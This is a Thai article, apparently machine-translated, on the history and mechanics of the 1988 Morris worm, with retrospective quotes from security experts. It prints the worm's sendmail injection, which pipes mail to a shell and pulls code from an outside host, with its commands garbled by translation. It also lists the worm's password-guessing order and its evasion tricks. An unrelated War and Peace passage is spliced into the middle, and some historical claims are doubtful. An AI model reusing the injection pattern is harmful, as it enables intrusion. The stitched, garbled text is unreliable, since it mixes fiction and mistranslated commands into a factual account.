เมื่อวันที่ 2 พฤศจิกายน พ.ศ. 2531 เครือข่าย ARPANET ถูกโจมตีโดยโปรแกรมซึ่งต่อมากลายเป็นที่รู้จักในชื่อ "หนอนมอร์ริส" ซึ่งตั้งชื่อตามผู้สร้าง Robert Morris Jr. นักศึกษามหาวิทยาลัย Cornell ARPANET (เครือข่ายหน่วยงานโครงการวิจัยขั้นสูง) ถูกสร้างขึ้นในปี 1969 ตามความคิดริเริ่มของสำนักงานโครงการวิจัยขั้นสูงของกระทรวงกลาโหมสหรัฐ (DARPA, สำนักงานโครงการวิจัยขั้นสูงด้านกลาโหม) และเป็นต้นแบบของอินเทอร์เน็ต เครือข่ายนี้ถูกสร้างขึ้นเพื่อประโยชน์ของนักวิจัยในสาขานี้ เทคโนโลยีคอมพิวเตอร์และเทคโนโลยีในการแลกเปลี่ยนข้อความตลอดจนโปรแกรมและชุดข้อมูลระหว่างศูนย์วิจัยหลัก ห้องปฏิบัติการ มหาวิทยาลัย องค์กรภาครัฐและบริษัทเอกชนที่ทำงานเพื่อประโยชน์ของกระทรวงกลาโหมสหรัฐ (กระทรวงกลาโหมสหรัฐ) ตามคำร้องขอของกระทรวงการพัฒนาหนึ่งในสามโปรโตคอลที่พบบ่อยที่สุดได้รับการพัฒนา ชั้นการขนส่งโมเดล OSI เรียกว่า TCP/IP ซึ่งต่อมาได้กลายเป็นโมเดลหลักใน ARPANET ในปี 1983 ในช่วงปลายยุค 80 เครือข่ายประกอบด้วยคอมพิวเตอร์หลายหมื่นเครื่อง ARPANET ยุติลงในเดือนมิถุนายน พ.ศ. 2533
Morris Worm เป็นตัวอย่างแรกของซอฟต์แวร์ที่เป็นอันตรายในประวัติศาสตร์ของเทคโนโลยีคอมพิวเตอร์ ซอฟต์แวร์ซึ่งใช้กลไกการเผยแพร่เครือข่ายอัตโนมัติ เพื่อจุดประสงค์นี้ มีการใช้ช่องโหว่หลายประการของบริการเครือข่าย รวมถึงบางช่องโหว่ด้วย จุดอ่อน ระบบคอมพิวเตอร์เนื่องจากความใส่ใจต่อปัญหาด้านความปลอดภัยไม่เพียงพอในขณะนั้น
ตามที่ Robert Morris กล่าวไว้ หนอนถูกสร้างขึ้นเพื่อการวิจัย รหัสของเขาไม่มี "เพย์โหลด" (ฟังก์ชันการทำลายล้าง) อย่างไรก็ตาม เนื่องจากข้อผิดพลาดในอัลกอริธึมการทำงาน การแพร่กระจายของเวิร์มทำให้เกิดสิ่งที่เรียกว่า “การปฏิเสธการให้บริการ” เมื่อคอมพิวเตอร์ยุ่งอยู่กับการดำเนินการสำเนาของเวิร์มจำนวนมากและหยุดตอบสนองต่อคำสั่งของผู้ปฏิบัติงาน Morris Worm ทำให้การทำงานของคอมพิวเตอร์บนเครือข่าย ARPANET เป็นอัมพาตนานถึงห้าวัน เวลาหยุดทำงานโดยประมาณคืออย่างน้อย 8 ล้านชั่วโมง และเวลามากกว่า 1 ล้านชั่วโมงที่ใช้ในการกู้คืนระบบให้ทำงานได้ การสูญเสียทั้งหมดในแง่การเงินอยู่ที่ประมาณ 98 ล้านดอลลาร์ ซึ่งประกอบด้วยการสูญเสียทั้งทางตรงและทางอ้อม
รวมการสูญเสียโดยตรง (32 ล้านดอลลาร์):
การหยุด การทดสอบ และการรีบูตเครื่องจำนวน 42,700 เครื่อง
การระบุเวิร์ม การกำจัด การทำความสะอาดหน่วยความจำ และการฟื้นฟูเครื่องจักร 6200 เครื่อง
การวิเคราะห์รหัสเวิร์ม การถอดแยกชิ้นส่วน และการจัดทำเอกสาร
ซ่อมระบบ UNIX และทดสอบ
รวมการสูญเสียทางอ้อม (66 ล้านดอลลาร์):
การสูญเสียเวลาคอมพิวเตอร์เนื่องจากขาดการเข้าถึงเครือข่าย
การสูญเสียการเข้าถึงเครือข่ายของผู้ใช้
อย่างไรก็ตาม การประเมินเหล่านี้จะต้องได้รับการปฏิบัติอย่างระมัดระวังอย่างยิ่ง
ตามโครงสร้างหนอนประกอบด้วยสามส่วน - "หัว" และ "หาง" สองอัน "หัว" นั่นเอง แหล่งที่มาใน C (99 บรรทัด) และคอมไพล์โดยตรงบนเครื่องระยะไกล จากมุมมอง "ก้อย" นั้นเหมือนกัน ซอร์สโค้ดและอัลกอริธึม ไฟล์ไบนารีแต่เรียบเรียงภายใต้ ประเภทต่างๆสถาปัตยกรรม ตามแผนของมอร์ริส VAX และ SUN ได้รับเลือกให้เป็นแพลตฟอร์มฮาร์ดแวร์เป้าหมาย “หัว” ถูกร่ายด้วยวิธีต่อไปนี้:
- ใช้โหมดแก้ไขข้อบกพร่องใน sendmail
- การใช้ประโยชน์จากช่องโหว่บัฟเฟอร์ล้นในบริการเครือข่ายแบบฟิงเกอร์
- การเลือกล็อกอินและรหัสผ่านสำหรับการรันโปรแกรมระยะไกล (rexec)
- โทรระยะไกล ล่ามคำสั่ง(rsh) โดยการคาดเดาการเข้าสู่ระบบและรหัสผ่านหรือใช้กลไกการเชื่อถือ
แก้ปัญหา
จดหมายจาก:
rcptto:<"|sed-e "1,/^$/d" | /bin/sh; exit 0">
ข้อมูล
ซีดี /usr/tmp.cd
แมว >x14481910.c<<"EOF"
<текст программы l1.c>
อีโอเอฟ
ซีซี -o x14481910 x14481910.s; x14481910 128.32.134.16 32341 8712440; RM -f x14481910 x14481910.c
.
ล้มเลิก
อย่างที่คุณเห็น ส่วนหัวถูกลบออกจากเนื้อความของตัวอักษร (โดยใช้ตัวประมวลผลข้อความ sed) และไฟล์ซอร์สโค้ด "head" ได้ถูกบันทึกไว้ จากนั้น ตัวประมวลผลคำสั่งจะได้รับคำแนะนำในการคอมไพล์โค้ด “head” เรียกใช้ไฟล์ปฏิบัติการที่เป็นผลลัพธ์ และลบไฟล์ชั่วคราว
เพื่อใช้ประโยชน์จากช่องโหว่ของบริการฟิงเกอร์ เวิร์มได้ส่งสตริงที่เตรียมไว้เป็นพิเศษขนาด 536 ไบต์ ซึ่งท้ายที่สุดเรียกว่าฟังก์ชัน execve("/bin/sh", 0, 0) สิ่งนี้ใช้ได้กับคอมพิวเตอร์ VAX ที่ใช้ 4.3BSD เท่านั้น คอมพิวเตอร์ SUN ที่ใช้ SunOS ไม่มีช่องโหว่นี้
หากต้องการใช้วิธีการกระจาย rexec และ rsh รายชื่อผู้ใช้เครื่องภายในจะถูกรวบรวม จากนั้นจะมีการเลือกรหัสผ่านที่ใช้บ่อยที่สุดโดยหวังว่าผู้ใช้จำนวนมากจะมีชื่อและรหัสผ่านเดียวกันในทุกเครื่องบนเครือข่ายซึ่งปรากฏว่าไม่ไกลจากความจริง นอกเหนือจากการเลือกแล้ว rsh ยังใช้กลไกการเชื่อถือ หรือกลไกการตรวจสอบสิทธิ์แบบง่ายโดยอิงตามที่อยู่ IP ของเครื่องระยะไกล ที่อยู่ดังกล่าวถูกจัดเก็บไว้ในไฟล์ /etc/hosts.equiv และ .rhosts สำหรับคอมพิวเตอร์ส่วนใหญ่ ความไว้วางใจนั้นมีร่วมกัน ดังนั้นด้วยความน่าจะเป็นในระดับสูง รายการที่อยู่ IP จากไฟล์เหล่านี้ที่เวิร์มพบ ทำให้สามารถเข้าสู่ระบบระยะไกลผ่าน rsh ได้โดยไม่ต้องใช้รหัสผ่านเลย
เมื่อทำการค้นหา เวิร์มได้ลองใช้ตัวเลือกรหัสผ่านต่อไปนี้:
- ว่างเปล่า;
- ชื่อผู้ใช้ (ผู้ใช้);
- ชื่อผู้ใช้สะกดกลับหลัง (resu);
- การซ้ำซ้อนชื่อผู้ใช้ (useruser);
- ชื่อหรือนามสกุลของผู้ใช้ (John, Smith);
- ชื่อหรือนามสกุลของผู้ใช้เป็นตัวพิมพ์เล็ก (john, smith);
- พจนานุกรมในตัว 432 คำ;
- /usr/dict/words มีประมาณ 24,000 คำและใช้ใน 4.3BSD (และอื่น ๆ ) เป็นพจนานุกรมการสะกดคำ หากคำขึ้นต้นด้วยตัวพิมพ์ใหญ่ ระบบจะตรวจสอบเวอร์ชันที่มีอักษรตัวพิมพ์เล็กด้วย
เวิร์มใช้เทคนิคหลายอย่างเพื่อทำให้ผู้ดูแลระบบคอมพิวเตอร์ตรวจจับได้ยาก:
- การลบไฟล์ปฏิบัติการของคุณหลังจากเปิดตัว
- ข้อความแสดงข้อผิดพลาดทั้งหมดถูกปิดใช้งาน และขนาดการถ่ายโอนข้อมูลความผิดพลาดถูกตั้งค่าเป็นศูนย์
- ไฟล์ปฏิบัติการของเวิร์มถูกบันทึกภายใต้ชื่อ sh ซึ่งเป็นชื่อเดียวกับที่ใช้โดยล่ามคำสั่ง Bourne Shell ดังนั้นจึงซ่อนเวิร์มไว้ในรายการกระบวนการ
- ประมาณทุก ๆ สามนาที เธรดลูกจะถูกสร้างขึ้นและเธรดพาเรนต์จะถูกยกเลิก โดย pid ของกระบวนการเวิร์มจะเปลี่ยนแปลงอยู่ตลอดเวลา และเวลาทำงานที่แสดงในรายการกระบวนการจะถูกรีเซ็ต
- สตริงข้อความทั้งหมดถูกเข้ารหัสโดยใช้การดำเนินการ xor 81h
เหตุการณ์ที่เกิดขึ้นกับ “หนอนมอร์ริส” ทำให้ผู้เชี่ยวชาญด้านไอทีต้องคิดอย่างจริงจังเกี่ยวกับปัญหาด้านความปลอดภัย โดยเฉพาะอย่างยิ่งหลังจากนั้น เพื่อเพิ่มความปลอดภัยของระบบ การใช้การหยุดชั่วคราวหลังจากป้อนรหัสผ่านไม่ถูกต้อง และจัดเก็บรหัสผ่านใน /etc/shadow โดยที่พวกเขาถูกย้ายจากสถานะที่อ่านได้ เริ่มแนะนำผู้ใช้ทั้งหมดของ /etc/passwd แต่เหตุการณ์ที่สำคัญที่สุดคือการก่อตั้งศูนย์ประสานงาน CERT (CERT/CC) ในเดือนพฤศจิกายน พ.ศ. 2531 ซึ่งมีกิจกรรมที่เกี่ยวข้องกับการแก้ไขปัญหาความปลอดภัยทางอินเทอร์เน็ต กระดานข่าวการรักษาความปลอดภัยของ CERT ฉบับแรกที่ปรากฏในเดือนธันวาคม พ.ศ. 2531 โดยรายงานเกี่ยวกับช่องโหว่ที่เวิร์มใช้ประโยชน์ เป็นที่น่าสังเกตว่าโซลูชันทางเทคนิคหลายอย่างที่หนอน Morris ใช้ เช่น การใช้รหัสผ่าน bruteforce การรวบรวมโค้ดบูตโหลดเดอร์บนคอมพิวเตอร์ระยะไกลที่ใช้ระบบ *NIX (Slapper) การสแกนเครือข่ายเพื่อระบุเป้าหมาย ฯลฯ นอกจากนี้ยังใช้ในตัวอย่างซอฟต์แวร์ที่เป็นอันตรายในปัจจุบันอีกด้วย
เป็นที่น่าสนใจว่าในปี 1988 เดียวกัน Peter Norton โปรแกรมเมอร์ชื่อดังได้พูดออกมาอย่างชัดเจนในสื่อเกี่ยวกับข้อเท็จจริงของการมีอยู่ของไวรัสคอมพิวเตอร์โดยเรียกพวกมันว่า "ตำนาน" และเปรียบเทียบเสียงรบกวนในหัวข้อนี้กับ "เรื่องราวเกี่ยวกับจระเข้ อาศัยอยู่ในท่อระบายน้ำของนิวยอร์ก” เพียงสองปีหลังจากการประกาศของ Norton ในปี 1990 โปรแกรมป้องกันไวรัสเวอร์ชันแรก Norton AntiVirus ก็ได้เปิดตัว
และในที่สุด - ในปี 1988 สมาคมอุปกรณ์คอมพิวเตอร์แห่งอเมริกา (American Computer Equipment Association) รู้สึกประทับใจกับการโจมตีของหนอนมอร์ริส จึงประกาศให้วันที่ 30 พฤศจิกายน เป็นวันรักษาความปลอดภัยคอมพิวเตอร์สากล ซึ่งมีการเฉลิมฉลองมาจนถึงทุกวันนี้
เขียนโดยนักศึกษาระดับบัณฑิตศึกษาของ Cornell Robert Tappan Morris และเปิดตัวเมื่อวันที่ 2 พฤศจิกายน 1988
มันเป็นไวรัสตัวแรกที่ได้รับความสนใจอย่างมากในสื่อ นอกจากนี้ยังส่งผลให้มีการลงโทษครั้งแรกในสหรัฐอเมริกาภายใต้พระราชบัญญัติการฉ้อโกงและการใช้คอมพิวเตอร์ปี 1986
ประวัติความเป็นมาของการปรากฏตัว
มอร์ริสเองก็เก็บโค้ดของโปรแกรมไว้อย่างดี และไม่น่าเป็นไปได้ที่ใครจะพิสูจน์ความเกี่ยวข้องของเขาได้ อย่างไรก็ตาม พ่อของเขาซึ่งเป็นผู้เชี่ยวชาญด้านคอมพิวเตอร์ที่สำนักงานความมั่นคงแห่งชาติ คิดว่าเป็นการดีกว่าถ้าลูกชายจะสารภาพทุกอย่าง
ในการพิจารณาคดี โรเบิร์ต มอร์ริส ต้องเผชิญกับโทษจำคุกสูงสุด 5 ปี และปรับ 250,000 ดอลลาร์ อย่างไรก็ตาม เมื่อคำนึงถึงพฤติการณ์เพื่อบรรเทาทุกข์ ศาลจึงพิพากษาให้เขาถูกคุมประพฤติ 3 ปี ปรับ 10,000 ดอลลาร์ และให้บริการสังคม 400 ชั่วโมง
การแพร่ระบาดได้แสดงให้เห็นว่าการเชื่อถือเครือข่ายคอมพิวเตอร์โดยไม่มีเงื่อนไขนั้นเป็นอันตรายเพียงใด ต่อมา มาตรฐานความปลอดภัยคอมพิวเตอร์ใหม่ที่เข้มงวดยิ่งขึ้นได้รับการพัฒนาเกี่ยวกับความปลอดภัยของรหัสโปรแกรม การดูแลระบบโหนดเครือข่าย และการเลือกรหัสผ่านที่ปลอดภัย
เขียนบทวิจารณ์บทความ "Morris Worm"
ลิงค์
ข้อความที่ตัดตอนมาจากลักษณะหนอนของมอร์ริส
- ทำไมคุณถึงจากไป? ทำไมคุณถึงอารมณ์เสีย? ทำไม? .. ” นาตาชาถามปิแอร์มองเข้าไปในดวงตาของเขาอย่างท้าทาย“เพราะฉันรักคุณ! - เขาอยากจะพูด แต่เขาไม่พูด เขาหน้าแดงจนร้องไห้และหลับตาลง
- เพราะเป็นการดีกว่าสำหรับฉันที่จะมาหาคุณให้น้อยลง... เพราะ... ไม่ ฉันแค่มีธุระ
- ทำไม? ไม่ บอกฉันที” นาตาชาเริ่มเด็ดขาดและเงียบไปในทันใด พวกเขาทั้งสองมองหน้ากันด้วยความกลัวและความสับสน เขาพยายามยิ้มแต่ทำไม่ได้ รอยยิ้มของเขาแสดงถึงความทุกข์ทรมาน และเขาก็จูบมือเธออย่างเงียบๆ แล้วจากไป
ปิแอร์ตัดสินใจที่จะไม่ไปเยี่ยม Rostovs ด้วยตัวเองอีกต่อไป
หลังจากได้รับการปฏิเสธอย่างเด็ดขาด Petya ก็ไปที่ห้องของเขาและขังตัวเองไว้ห่างจากทุกคนร้องไห้อย่างขมขื่น พวกเขาทำทุกอย่างราวกับว่าพวกเขาไม่ได้สังเกตเห็นอะไรเลย เมื่อเขามาถึงน้ำชา เงียบและมืดมนด้วยน้ำตาที่เปื้อนน้ำตา
วันรุ่งขึ้นกษัตริย์ก็มาถึง ลาน Rostov หลายแห่งขอไปพบซาร์ เช้าวันนั้น Petya ใช้เวลาแต่งตัวนานมาก หวีผม และจัดปกเสื้อให้เหมือนปกใหญ่ เขาขมวดคิ้วหน้ากระจก ทำท่าทาง ยักไหล่ และสุดท้ายโดยไม่บอกใคร เขาสวมหมวกและออกจากบ้านจากระเบียงด้านหลัง พยายามไม่ให้ใครสังเกตเห็น Petya ตัดสินใจตรงไปยังสถานที่ที่อธิปไตยอยู่และอธิบายกับมหาดเล็กบางคนโดยตรง (ดูเหมือน Petya ว่าอธิปไตยมักจะถูกรายล้อมไปด้วยแชมเบอร์เลน) ว่าเขาเคานต์รอสตอฟแม้จะยังเด็ก แต่ก็อยากจะรับใช้ปิตุภูมิ เยาวชนคนนั้น ไม่เป็นอุปสรรคต่อการถวายความจงรักภักดีและพร้อมแล้ว... เพชรยาขณะเตรียมตัวได้เตรียมถ้อยคำวิเศษมากมายที่จะพูดกับมหาดเล็กไว้
Petya นับความสำเร็จของการนำเสนอต่ออธิปไตยอย่างแม่นยำเพราะเขายังเป็นเด็ก (Petya ถึงกับคิดว่าทุกคนจะประหลาดใจในวัยเยาว์ของเขา) และในเวลาเดียวกันในการออกแบบปกเสื้อของเขาในทรงผมและในของเขา สงบ เดินช้าๆ อยากจะแสดงตัวเป็นคนแก่ แต่ยิ่งเขาไปไกลเท่าไร เขาก็ยิ่งรู้สึกขบขันกับผู้คนที่เข้าออกเครมลินมากเท่านั้น เขาก็ยิ่งลืมสังเกตลักษณะความใจเย็นและความเชื่องช้าของผู้ใหญ่ เมื่อเข้าใกล้เครมลิน เขาเริ่มดูแลว่าเขาจะไม่ถูกผลักเข้าไป และแสดงท่าทีข่มขู่อย่างเด็ดเดี่ยวโดยยื่นข้อศอกออกไปข้างตัว แต่ที่ประตูทรินิตี้ แม้จะตั้งใจแน่วแน่ ผู้คนที่อาจไม่รู้ว่าเขาจะไปที่เครมลินเพื่อความรักชาติอะไร ก็กดเขาเข้ากับกำแพงอย่างแรงจนต้องยอมจำนนและหยุดจนถึงประตูด้วยเสียงหึ่งๆ ข้างใต้ ซุ้มประตูมีเสียงรถม้าผ่านไปมา ใกล้กับ Petya มีผู้หญิงคนหนึ่งยืนอยู่พร้อมกับทหารราบหนึ่งคน พ่อค้าสองคน และทหารเกษียณอายุหนึ่งคน หลังจากยืนอยู่ที่ประตูมาระยะหนึ่งแล้ว Petya โดยไม่รอให้รถม้าทั้งหมดผ่านไปอยากจะก้าวไปข้างหน้าคนอื่น ๆ และเริ่มใช้ข้อศอกอย่างเด็ดขาด แต่ผู้หญิงที่ยืนอยู่ตรงข้ามเขาซึ่งคนแรกชี้ศอกของเขาก็ตะโกนใส่เขาด้วยความโกรธ:
- อะไรนะ barchuk คุณกำลังผลักคุณเห็นไหม - ทุกคนยืนอยู่ แล้วจะปีนทำไม!
“ ดังนั้นทุกคนจะปีนเข้าไป” ทหารราบกล่าวและเริ่มใช้ข้อศอกบีบ Petya ไว้ที่มุมประตูที่มีกลิ่นเหม็น
Petya เช็ดเหงื่อที่ปกคลุมใบหน้าด้วยมือของเขา และยืดคอปกที่ชุ่มไปด้วยเหงื่อซึ่งเขาจัดไว้ที่บ้านอย่างดีเหมือนอันใหญ่
Petya รู้สึกว่าเขามีรูปลักษณ์ที่ไม่ปรากฏ และกลัวว่าหากเขาแสดงตัวเช่นนั้นต่อมหาดเล็ก เขาก็จะไม่ได้รับอนุญาตให้พบอธิปไตย แต่ไม่มีทางที่จะฟื้นตัวและย้ายไปที่อื่นได้เนื่องจากสภาพที่คับแคบ นายพลคนหนึ่งที่ผ่านไปคือคนรู้จักของ Rostovs Petya ต้องการขอความช่วยเหลือ แต่คิดว่ามันขัดกับความกล้าหาญ เมื่อรถม้าทั้งหมดผ่านไป ฝูงชนก็พากันพา Petya ออกไปที่จัตุรัสซึ่งมีผู้คนเต็มไปหมด ไม่เพียงแต่ในพื้นที่เท่านั้น แต่บนเนินเขา บนหลังคา ก็มีผู้คนอยู่ทุกหนทุกแห่ง ทันทีที่ Petya พบว่าตัวเองอยู่ที่จัตุรัส เขาก็ได้ยินเสียงระฆังและเสียงพูดคุยพื้นบ้านอันสนุกสนานที่ดังไปทั่วเครมลินอย่างชัดเจน
ครั้งหนึ่งจัตุรัสกว้างขวางมากขึ้น แต่ทันใดนั้นหัวของพวกเขาก็เปิดออก ทุกอย่างก็รีบรุดไปข้างหน้าที่อื่น Petya ถูกบีบจนหายใจไม่ออกและทุกคนก็ตะโกนว่า: "ไชโย! ไชโย! ไชโย! Petya ยืนเขย่งเท้าผลักบีบ แต่มองไม่เห็นอะไรเลยนอกจากคนรอบข้าง
มีการแสดงออกถึงความอ่อนโยนและความยินดีบนใบหน้าของทุกคน ภรรยาพ่อค้าคนหนึ่งยืนอยู่ข้างๆ Petya ร้องไห้สะอึกสะอื้นและมีน้ำตาไหลออกมาจากดวงตาของเธอ
- พ่อ นางฟ้า พ่อ! - เธอพูดพร้อมใช้นิ้วเช็ดน้ำตา
แฮมสเตอร์เฉลิมฉลองวันครบรอบเหตุการณ์อันไม่พึงประสงค์ครั้งหนึ่ง - หนอนมอร์ริสมีอายุ 20 ปีรายงาน
เมื่อประเมินผลที่ตามมาของการโจมตีครั้งใหญ่ครั้งแรกบนอินเทอร์เน็ต ควรสังเกตว่าหนอนมอร์ริสทำหน้าที่เป็นคำเตือนที่เลวร้ายต่อชุมชนวิศวกรรมอินเทอร์เน็ต เขาแสดงให้เห็นอย่างชัดเจนถึงอันตรายร้ายแรงที่เกิดจากข้อผิดพลาดของซอฟต์แวร์และเปลี่ยนความปลอดภัยของเครือข่ายให้กลายเป็นส่วนสำคัญของการวิจัยและการพัฒนาเชิงปฏิบัติ
“นี่เป็นเหตุการณ์ที่สำคัญมาก” เอริค ออลแมนกล่าว ในปี 1981 ขณะที่เป็นนักศึกษาที่มหาวิทยาลัยแคลิฟอร์เนีย เบิร์กลีย์ ออลแมนได้พัฒนา sendmail ซึ่งเป็นโปรแกรมโอเพ่นซอร์สที่จัดการอีเมลทางอินเทอร์เน็ต ปัจจุบันเขาดำรงตำแหน่งผู้อำนวยการด้านวิทยาศาสตร์ของ Sendmail ซึ่งเป็นบริษัทที่จำหน่ายโปรแกรมนี้ในเชิงพาณิชย์
“สมัยนั้นอินเทอร์เน็ตยังเล็กมากและถือเป็นชมรมงานอดิเรกประเภทหนึ่ง” ออลแมนอธิบาย - หลังจากการโจมตีของมอร์ริส เห็นได้ชัดว่าผู้เยี่ยมชมบางส่วนอาจไม่ได้มาที่ "คลับ" นี้ด้วยความตั้งใจที่ดีที่สุด เราตระหนักว่าเราต้องคำนึงถึงเรื่องความปลอดภัยอย่างเร่งด่วน”
แม้จะมีกลไกการออกฤทธิ์ที่ชัดเจนของหนอนและความวุ่นวายมากมายที่เกิดขึ้นรอบๆ ตัวมัน บางคนแย้งว่าในเวลานั้นหนอนยังไม่ได้รับการชื่นชมในทันที
“บทเรียนที่น่าสนใจที่สุดที่หนอนมอร์ริสสอนเราคือผลลัพธ์ในระยะสั้นและน้อยเพียงใด” Steve Bellovin ศาสตราจารย์จากมหาวิทยาลัยโคลัมเบีย ซึ่งทำงานที่ Bell Labs เพื่อสร้างไฟร์วอลล์ตัวแรกในปี 1988 กล่าว -- ผู้คนสามารถเห็นภัยคุกคามที่เกิดจากข้อบกพร่องของซอฟต์แวร์ แต่หลังจากนั้นไม่มีใครให้ความสนใจอย่างจริงจังกับปัญหาความปลอดภัยของเครือข่าย สิ่งนี้ดำเนินต่อไปจนถึงกลางทศวรรษที่ 90 ทำให้เกิดความยากลำบากเพิ่มเติมมากมายในเวลาต่อมา”
หนอนประวัติศาสตร์นี้เขียนโดยนักศึกษามหาวิทยาลัย Cornell Robert Tappan Morris ซึ่งถูกกล่าวหาว่าฉ้อโกงคอมพิวเตอร์อันเป็นผลมาจากเหตุการณ์ดังกล่าว ปัจจุบันมอร์ริสเป็นรองศาสตราจารย์ที่สถาบันเทคโนโลยีแมสซาชูเซตส์
เปิดตัวเมื่อเวลาประมาณหกโมงเย็นของวันที่ 2 พฤศจิกายน พ.ศ. 2531 โดยเวิร์มได้ปิดการใช้งานระบบที่เชื่อมต่อกับอินเทอร์เน็ตประมาณ 10% โดยรวมแล้วมีคอมพิวเตอร์มากกว่า 60,000 เครื่องเชื่อมต่อผ่านอินเทอร์เน็ต
หนอนมอร์ริสเป็นโปรแกรมที่แพร่กระจายตัวเองซึ่งใช้ประโยชน์จากจุดอ่อนที่ทราบในยูทิลิตี้ยอดนิยมจำนวนหนึ่ง รวมถึง sendmail ซึ่งรับผิดชอบในการกำหนดเส้นทางอีเมล และ Finger ซึ่งทำให้สามารถค้นหาได้ว่าผู้ใช้คนใดกำลังเริ่มเซสชันบนอินเทอร์เน็ต .
หนอนมอร์ริสสามารถเจาะระบบที่ใช้ระบบปฏิบัติการยูนิกซ์หลากหลายรูปแบบได้ เวิร์มแพร่กระจายอย่างรวดเร็วผ่านอินเทอร์เน็ต แพร่กระจายสำเนาของตัวเองมากขึ้นเรื่อยๆ ทำให้คอมพิวเตอร์ติดไวรัสซ้ำแล้วซ้ำเล่า ส่งผลให้ระบบต่างๆ เริ่มทำงานผิดปกติ
“ในตอนแรกเราไม่รู้ว่าภัยคุกคามอาจมาจากไหน” ออลแมนเล่า “เห็นได้ชัดว่าสิ่งนี้เกิดขึ้นโดยเจตนา แต่เราไม่สามารถระบุได้ว่าใครเป็นคนทำและทำไม ความตื่นตระหนกเริ่มต้นขึ้น ซึ่งค่อนข้างเข้าใจได้แม้จะมีสถานการณ์เลวร้ายเช่นนี้ก็ตาม”
การโจมตีดังกล่าวได้บล็อกการทำงานปกติของอินเทอร์เน็ตเป็นระยะเวลานาน ทำให้องค์กรต่างๆ รวมถึงกระทรวงกลาโหมต้องปิดเกตเวย์อินเทอร์เน็ตของตนเพื่อหลีกเลี่ยงการติดเชื้อเพิ่มเติม
“ผู้คนปิดอินเทอร์เน็ตเพราะกลัวผลเสียที่อาจเกิดขึ้น” ออลแมนกล่าว - อย่างไรก็ตาม การตัดการเชื่อมต่อจากเครือข่ายทำให้การทำงานของช่องทางการสื่อสารที่สำคัญที่สุดหยุดชะงัก นั่นเป็นเหตุผลที่เราต้องรอเป็นเวลานานมากในการฟื้นฟูสภาพที่เป็นอยู่”
ในขณะที่หนอนมอร์ริสเริ่มต้นขึ้น ยังไม่มีการรับส่งข้อมูลทางอินเทอร์เน็ตและเว็บไซต์เชิงพาณิชย์ กลุ่มเหยื่อถูกจำกัดอยู่เพียงแผนกวิจัยของหน่วยงานรัฐบาล มหาวิทยาลัย และบริษัทจำนวนหนึ่งที่ใช้เครือข่ายเพื่อถ่ายโอนไฟล์และแลกเปลี่ยนอีเมล อย่างไรก็ตาม ข่าวการโจมตีดังกล่าวปรากฏในสื่อสิ่งพิมพ์ชั้นนำ โดยเฉพาะเดอะนิวยอร์กไทมส์
“ต้องขอบคุณหนอนมอร์ริสที่หลายๆ คนได้ยินเป็นครั้งแรกเกี่ยวกับการมีอยู่ของอินเทอร์เน็ต” เบลโลวินกล่าว - โดยส่วนใหญ่แล้ว เครือข่ายมีความเกี่ยวข้องกับโลกใหม่ที่แปลกประหลาดและแปลกประหลาด... และทันใดนั้น ปรากฎว่ามีผู้โจมตีเพียงคนเดียวเท่านั้นที่สามารถยุติโลกนี้ได้ ฉันขอย้ำอีกครั้งว่าไม่มีใครรู้อะไรเลยเกี่ยวกับอินเทอร์เน็ตเลย ยกเว้นผู้เชี่ยวชาญด้านคอมพิวเตอร์ที่เชี่ยวชาญด้านคอมพิวเตอร์”
สำหรับบางคน การกำเนิดของหนอนมอร์ริสเป็นจุดเปลี่ยนในอาชีพ Eugene Spafford เป็นอาจารย์อาวุโสของมหาวิทยาลัย Purdue ในขณะนั้น ปัจจุบัน Spafford ดำรงตำแหน่งผู้อำนวยการบริหารของ Center for Cybersecurity Education and Research ที่ Purdue University เขาเป็นหน่วยงานระดับนานาชาติที่ได้รับการยอมรับในด้านความปลอดภัยทางอินเทอร์เน็ต
“ฉันได้รับแจ้งว่าการวิจัยด้านความปลอดภัยคอมพิวเตอร์ประยุกต์นั้นไม่มีอนาคต” Spafford กล่าว “และหลังจากที่หนอนมอร์ริสปรากฏตัวขึ้น หลายคนก็ตระหนักได้ทันทีว่าระบบคอมพิวเตอร์ได้ก้าวไปไกลกว่าสภาพแวดล้อมเมนเฟรม ซึ่งทุกอย่างอยู่ภายใต้การควบคุม และตอนนี้เราต้องการรูปแบบการรักษาความปลอดภัยที่แตกต่างไปจากเดิมอย่างสิ้นเชิง จำเป็นต้องมีการนำเสนอโซลูชั่นทางวิศวกรรมที่ดีกว่า”
ก่อนหน้านี้ นักวิจัยพัฒนาเฉพาะเวิร์มที่ "มีประโยชน์" เท่านั้น ซึ่งติดตั้งการอัปเดตซอฟต์แวร์โดยอัตโนมัติ แต่ไม่มีใครเคยเปิดตัวโปรแกรมทำลายล้างบนอินเทอร์เน็ตที่ไม่สามารถควบคุมได้
เวิร์มมอร์ริสเป็นบรรพบุรุษของการโจมตีอื่นๆ ที่รู้จักกันดี รวมถึงเวิร์ม Melissa, Code Red และ Slammer ซึ่งทั้งหมดนี้มุ่งเป้าไปที่ระบบที่ใช้ซอฟต์แวร์ Microsoft เมื่อเร็ว ๆ นี้เวิร์มแพร่กระจายน้อยลงเมื่อเทียบกับไวรัสและอีเมลที่มีลิงก์ไปยังไซต์ที่เป็นอันตราย
“อันที่จริง เวิร์มพบได้น้อยกว่าไวรัสในปัจจุบันมาก” ออลแมนกล่าว “และสำหรับผู้ใช้ทั่วไป ภัยคุกคามที่ใหญ่ที่สุดคือฟิชชิ่ง”
“เราไม่ได้เห็นการโจมตีของเวิร์มขนาดใหญ่ในช่วงไม่กี่ปีที่ผ่านมา และมีสาเหตุหลายประการสำหรับสิ่งนี้” เบลโลวินอธิบาย “บทบาทสำคัญที่นี่เกิดจากการใช้เทคโนโลยีการแปลที่อยู่เครือข่ายและไฟร์วอลล์ส่วนบุคคลอย่างกว้างขวาง ซึ่งทำให้เวิร์มสมัยใหม่เจาะได้ยากในลักษณะเดียวกับที่เวิร์มมอร์ริสทำ”
หนอนมอร์ริสทำนายถึงการปรากฏตัวของการโจมตีแบบปฏิเสธการให้บริการแบบกระจาย ซึ่งผู้โจมตีใช้เพื่อโอเวอร์โหลดระบบ และทำให้สูญเสียการเชื่อมต่อกับอินเทอร์เน็ต
